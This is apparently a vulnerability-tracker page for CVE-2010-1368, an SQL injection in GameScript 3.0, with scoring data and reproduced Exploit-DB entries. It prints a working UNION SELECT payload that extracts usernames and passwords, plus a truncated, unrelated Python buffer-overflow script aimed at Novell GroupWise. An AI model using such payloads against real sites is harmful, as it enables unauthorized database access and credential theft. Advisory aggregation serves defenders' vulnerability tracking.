CVE-2010-1368
Published 2010-04-13
Priority P3 · 41 · high · 7.5 (CVSS 2.0)
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 0.97% (57.4th percentile)
SQL injection vulnerability in index.php in GameScript (GS) 3.0 allows remote attackers to execute arbitrary SQL commands via the id parameter in a category action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| gamescript | gamescript | — | — |
No detection rules found.
Exploit-DB
Novell Groupwise 8.0 - Multiple Remote Vulnerabilities
exploitdb·2010-11-08
CVE-2010-4715 Novell Groupwise 8.0 - Multiple Remote Vulnerabilities
---
source: https://www.securityfocus.com/bid/44732/info
Novell GroupWise is prone to multiple security vulnerabilities, including multiple remote code-execution vulnerabilities, an information-disclosure issue, and a cross-site scripting issue.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, obtain potentially sensitive information, or execute arbitrary code in the context of the user running the affected application. Information harvested may aid in further attacks; other attacks are also possible.
```python
#!/usr/bin/python
#
# Francis Provencher for Protek Research Lab's.
#
#
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = '\x41' * 1368
s.connect(('192.
```
Exploit-DB
GameScript 3.0 - SQL Injection
exploitdb·2010-02-25
CVE-2010-1368 GameScript 3.0 - SQL Injection
---
Author : FormatXformat
Home : Tkurd.net
Script : http://www.gamescript.net
Vulnerabilities : SQL Injection
Dork:
Copyright © 2005 - 2006 GameScript.net. All Games Copyright © To Their Respective Owners. All Rights Reserved.
Exploit:
/index.php?action=category&id=-6+union+all+select+1,concat(username,0x3a,password),3+from+users--
Admin page: admincp
Demo :
http://server/index.php?action=category&id=-6+union+all+select+1,concat(username,0x3a,password),3+from+users--
No writeups or analysis indexed.
http://packetstormsecurity.org/1002-exploits/gamescript-sql.txt
http://www.exploit-db.com/exploits/11577
http://www.securityfocus.com/bid/38414
https://exchange.xforce.ibmcloud.com/vulnerabilities/56537
Published: 2010-04-13